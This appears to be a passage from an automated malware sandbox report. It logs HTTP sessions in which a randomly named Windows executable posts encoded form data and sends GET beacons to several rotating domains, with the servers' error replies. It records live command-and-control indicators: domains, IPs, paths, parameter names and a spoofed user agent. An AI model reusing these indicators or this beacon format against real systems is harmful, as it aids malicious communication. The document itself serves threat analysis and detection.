                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.4 | 55424 | 203.161.55.102 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:59.676848888 CEST | 726 | OUT | POST /irn0/ HTTP/1.1
                                                    Host: www.slushcafe.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.slushcafe.top
                                                    Referer: http://www.slushcafe.top/irn0/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 2f 7a 79 57 4e 73 33 61 64 63 2b 41 73 33 32 66 64 33 48 4c 49 42 48 47 2b 52 6e 47 47 6c 43 45 68 76 35 2b 56 65 35 71 7a 52 70 6f 6f 6f 53 75 69 52 55 47 43 4c 5a 54 33 69 4c 59 41 57 36 39 56 79 63 46 64 51 68 63 63 4e 4c 6c 4f 33 6b 48 4c 75 6f 5a 32 45 6d 75 63 4a 52 52 63 59 55 77 48 6f 64 6d 41 53 70 4a 59 51 5a 57 53 58 54 6f 74 51 44 70 45 66 65 4f 78 61 75 45 42 53 37 50 4b 79 33 4a 75 49 76 56 78 73 52 71 59 41 53 67 30 39 62 34 4e 62 67 63 32 67 69 47 6f 4a 48 51 4f 75 4a 6e 77 57 4f 4f 72 67 51 79 6c 50 6b 75 6d 51 72 45 57 67 76 70 55 75 68 4b 7a 39 42 69 2f 39 4c 6a 72 7a 57 57 76 7a 30 3d
                                                    Data Ascii: efM=mmMV1xSFqhYG/zyWNs3adc+As32fd3HLIBHG+RnGGlCEhv5+Ve5qzRpoooSuiRUGCLZT3iLYAW69VycFdQhccNLlO3kHLuoZ2EmucJRRcYUwHodmASpJYQZWSXTotQDpEfeOxauEBS7PKy3JuIvVxsRqYASg09b4Nbgc2giGoJHQOuJnwWOOrgQylPkumQrEWgvpUuhKz9Bi/9LjrzWWvz0=
                                                    Aug 5, 2024 15:33:00.270761967 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 05 Aug 2024 13:33:00 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.4 | 55425 | 203.161.55.102 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:02.206785917 CEST | 10808 | OUT | POST /irn0/ HTTP/1.1
                                                    Host: www.slushcafe.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.slushcafe.top
                                                    Referer: http://www.slushcafe.top/irn0/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 2f 7a 79 57 4e 73 33 61 64 63 2b 41 73 33 32 66 64 33 48 4c 49 42 48 47 2b 52 6e 47 47 6c 4b 45 67 65 5a 2b 55 35 6c 71 30 52 70 6f 72 6f 53 76 69 52 56 45 43 49 70 50 33 69 32 6c 41 53 4b 39 55 52 45 46 66 6a 35 63 58 4e 4c 6c 47 58 6b 47 50 75 6f 4d 32 41 36 69 63 4a 42 52 63 59 55 77 48 75 78 6d 4a 6e 56 4a 4c 41 5a 52 62 33 54 6b 37 67 43 4d 45 66 58 35 78 61 36 36 42 45 4c 50 45 78 66 4a 68 64 37 56 79 4d 52 6f 62 41 53 47 30 39 6e 6e 4e 62 4e 6c 32 67 57 73 6f 4c 62 51 50 70 4d 6f 68 46 2b 30 70 6a 30 76 78 38 4d 2b 6e 58 57 4a 58 43 43 57 62 37 38 51 6a 4d 46 58 6b 65 2b 36 77 57 61 65 35 6d 4f 74 67 49 36 43 52 35 45 67 35 6b 4f 76 46 74 79 38 57 69 37 63 68 4a 61 65 4e 6c 76 68 62 43 63 7a 4c 39 36 4c 35 39 47 6f 4f 4a 47 30 36 52 68 71 59 62 41 6b 71 4c 6e 72 66 58 57 33 61 34 7a 64 4b 78 6c 38 45 35 43 6a 48 44 2b 62 67 41 59 49 72 6d 47 33 44 71 79 51 50 59 41 59 66 52 47 72 70 78 6c 7a 49 41 66 33 4d 43 56 6f 58 58 51 44 2b 65 7a 55 54 47 [TRUNCATED]
                                                    Data Ascii: efM= [TRUNCATED]
                                                    Aug 5, 2024 15:33:02.852524996 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 05 Aug 2024 13:33:02 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.4 | 55426 | 203.161.55.102 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:04.736814976 CEST | 438 | OUT | GET /irn0/?efM=rkk12BbGqxBZ8yyVdqr4fumsqySnbS/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdycpy6GTweDeod91OQcupKfuQbLLwzDVUdZDA=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.slushcafe.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:33:05.338709116 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 05 Aug 2024 13:33:05 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.4 | 55427 | 216.83.33.140 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:10.931991100 CEST | 697 | OUT | POST /mpex/ HTTP/1.1
                                                    Host: www.a9jcpf.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.a9jcpf.top
                                                    Referer: http://www.a9jcpf.top/mpex/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 37 30 77 42 6f 56 4e 75 55 4b 73 79 4b 64 30 6d 58 45 33 47 42 66 36 58 76 72 44 6b 61 53 31 73 64 51 78 63 33 58 55 35 2b 6f 38 6a 61 41 72 38 58 39 35 75 6e 61 64 31 57 52 76 57 72 37 62 43 65 37 74 42 74 50 32 4e 7a 31 38 65 57 39 54 61 61 53 32 57 68 76 69 6b 63 53 4a 4f 58 7a 56 62 74 73 59 32 36 63 2f 66 4b 6e 41 5a 58 49 47 57 2f 45 73 6b 41 65 6d 6e 55 35 74 30 43 6e 57 75 4b 2b 4f 4f 4d 42 30 41 62 64 6d 74 67 7a 76 50 31 69 72 37 74 6e 56 59 42 44 38 30 37 6e 76 64 4b 6f 43 71 4f 6b 31 6f 53 73 61 42 4a 51 33 31 57 49 32 71 51 3d 3d
                                                    Data Ascii: efM=UZXPUba8LAvof70wBoVNuUKsyKd0mXE3GBf6XvrDkaS1sdQxc3XU5+o8jaAr8X95unad1WRvWr7bCe7tBtP2Nz18eW9TaaS2WhvikcSJOXzVbtsY26c/fKnAZXIGW/EskAemnU5t0CnWuK+OOMB0AbdmtgzvP1ir7tnVYBD807nvdKoCqOk1oSsaBJQ31WI2qQ==
                                                    Aug 5, 2024 15:33:11.866707087 CEST | 208 | IN | HTTP/1.1 530
                                                    Date: Mon, 05 Aug 2024 13:33:11 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cdn
                                                    Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 30 20 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii (UTF-8 decoded, chunked): 2c | ➡️当前访问的节点：216.83.33.140 | 0   (the Chinese text, dropped by the ASCII rendering, reads "current access node: 216.83.33.140")


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.4 | 55428 | 216.83.33.140 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:13.474692106 CEST | 717 | OUT | POST /mpex/ HTTP/1.1
                                                    Host: www.a9jcpf.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.a9jcpf.top
                                                    Referer: http://www.a9jcpf.top/mpex/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 61 45 77 45 50 35 4e 35 45 4b 74 75 36 64 30 7a 48 46 77 47 42 6a 36 58 72 36 62 6b 73 69 31 73 34 73 78 64 79 37 55 34 2b 6f 38 70 36 41 75 34 58 39 69 75 6e 48 69 31 58 39 76 57 76 54 62 43 63 7a 74 43 61 54 31 50 6a 31 79 48 47 39 52 58 36 53 32 57 68 76 69 6b 63 58 53 4f 58 72 56 61 63 63 59 33 65 49 2b 42 61 6e 50 52 33 49 47 53 2f 45 6f 6b 41 65 59 6e 56 31 48 30 42 54 57 75 4c 4f 4f 50 64 42 31 4a 62 64 6b 6a 41 7a 77 66 33 7a 2b 37 65 69 53 51 51 48 51 71 34 58 39 63 4d 35 59 37 2f 46 69 36 53 49 70 63 4f 5a 44 34 56 31 2f 78 56 55 59 62 4a 68 37 61 6a 32 4d 32 46 74 71 61 4e 47 6a 33 4d 77 3d
                                                    Data Ascii: efM=UZXPUba8LAvofaEwEP5N5EKtu6d0zHFwGBj6Xr6bksi1s4sxdy7U4+o8p6Au4X9iunHi1X9vWvTbCcztCaT1Pj1yHG9RX6S2WhvikcXSOXrVaccY3eI+BanPR3IGS/EokAeYnV1H0BTWuLOOPdB1JbdkjAzwf3z+7eiSQQHQq4X9cM5Y7/Fi6SIpcOZD4V1/xVUYbJh7aj2M2FtqaNGj3Mw=
                                                    Aug 5, 2024 15:33:14.393913031 CEST | 208 | IN | HTTP/1.1 530
                                                    Date: Mon, 05 Aug 2024 13:33:14 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cdn
                                                    Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 30 20 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii (UTF-8 decoded, chunked): 2c | ➡️当前访问的节点：216.83.33.140 | 0   (the Chinese text, dropped by the ASCII rendering, reads "current access node: 216.83.33.140")


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.4 | 55429 | 216.83.33.140 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:16.004317999 CEST | 10799 | OUT | POST /mpex/ HTTP/1.1
                                                    Host: www.a9jcpf.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.a9jcpf.top
                                                    Referer: http://www.a9jcpf.top/mpex/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 61 45 77 45 50 35 4e 35 45 4b 74 75 36 64 30 7a 48 46 77 47 42 6a 36 58 72 36 62 6b 73 71 31 73 75 34 78 66 52 44 55 37 2b 6f 38 71 36 41 76 34 58 38 34 75 6e 66 6d 31 57 41 61 57 70 58 62 43 35 2f 74 44 75 6e 31 56 7a 31 79 49 6d 39 55 61 61 53 5a 57 68 2f 75 6b 66 2f 53 4f 58 72 56 61 65 45 59 2b 71 63 2b 44 61 6e 41 5a 58 49 4b 57 2f 45 41 6b 42 32 75 6e 56 68 39 30 53 4c 57 70 72 65 4f 4d 76 70 31 47 62 64 69 7a 51 79 6c 66 33 2b 75 37 64 47 76 51 51 7a 2b 71 2f 6e 39 65 4e 59 47 2f 39 45 2f 6e 41 67 57 44 4e 73 67 2f 33 4a 59 71 57 4e 39 4b 71 73 67 4f 33 36 46 38 31 38 50 4e 75 66 69 6c 71 59 2f 41 61 67 6a 78 49 33 30 74 31 78 6c 53 79 6e 57 58 54 76 79 45 35 7a 75 35 55 78 47 6f 4f 52 64 71 53 75 76 76 7a 70 61 55 4f 39 5a 6d 31 59 56 30 57 57 64 59 59 4c 78 4b 42 6b 43 6c 73 43 4f 73 55 75 2f 2b 44 4b 74 58 30 52 47 42 55 51 55 43 38 58 69 52 32 42 50 48 67 4f 71 6d 4c 4c 77 6d 4b 33 5a 49 63 50 4c 49 67 5a 75 62 38 54 39 58 38 74 39 50 58 [TRUNCATED]
                                                    Data Ascii: efM= [TRUNCATED]
                                                    Aug 5, 2024 15:33:16.886800051 CEST | 208 | IN | HTTP/1.1 530
                                                    Date: Mon, 05 Aug 2024 13:33:16 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cdn
                                                    Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 30 20 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii (UTF-8 decoded, chunked): 2c | ➡️当前访问的节点：216.83.33.140 | 0   (the Chinese text, dropped by the ASCII rendering, reads "current access node: 216.83.33.140")


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.4 | 55430 | 216.83.33.140 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:18.534984112 CEST | 435 | OUT | GET /mpex/?GTP=uhqpjxIPh&efM=Zb/vXsPYNAfjWKU5b+Nt30TyxsxOl11zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3DCw+G1Vpb7KEKzC8l577KkftecMR999sDYI= HTTP/1.1
                                                    Host: www.a9jcpf.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:33:19.469336033 CEST | 208 | IN | HTTP/1.1 530
                                                    Date: Mon, 05 Aug 2024 13:33:19 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cdn
                                                    Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 30 20 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 2c216.83.33.140 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.4 | 55431 | 35.241.42.217 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:33:25.219007015 CEST | 703 | OUT | POST /zjwj/ HTTP/1.1
                                                    Host: www.tqfabxah.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.tqfabxah.com
                                                    Referer: http://www.tqfabxah.com/zjwj/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 66 67 66 31 30 47 6c 7a 41 6c 6a 74 4e 4f 66 2f 75 67 6a 75 64 34 6b 58 74 44 4d 78 6c 53 61 50 78 47 48 49 58 38 61 55 68 64 31 74 35 6a 6d 4b 56 65 4f 38 35 62 76 58 77 49 59 74 6e 44 4f 65 48 61 6b 71 4e 72 33 39 47 51 66 76 47 53 38 51 37 69 74 51 6f 46 32 4a 6a 48 47 6b 48 68 36 67 68 71 69 33 39 69 37 49 63 52 42 49 4b 79 6d 63 6c 4c 2b 4e 4e 6c 6c 48 74 70 38 41 36 7a 6a 4f 6e 50 5a 74 4d 63 6f 55 58 4a 50 6f 43 34 43 39 4a 44 34 62 77 58 78 5a 4a 6e 77 34 4e 59 68 57 76 6a 2b 4d 55 33 4e 35 30 57 47 4a 58 65 68 57 44 38 6e 50 4c 67 3d 3d
                                                    Data Ascii: efM=qFjiaTJPEXcUfgf10GlzAljtNOf/ugjud4kXtDMxlSaPxGHIX8aUhd1t5jmKVeO85bvXwIYtnDOeHakqNr39GQfvGS8Q7itQoF2JjHGkHh6ghqi39i7IcRBIKymclL+NNllHtp8A6zjOnPZtMcoUXJPoC4C9JD4bwXxZJnw4NYhWvj+MU3N50WGJXehWD8nPLg==
                                                    Aug 5, 2024 15:33:25.855170012 CEST | 735 | IN | HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 05 Aug 2024 13:33:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
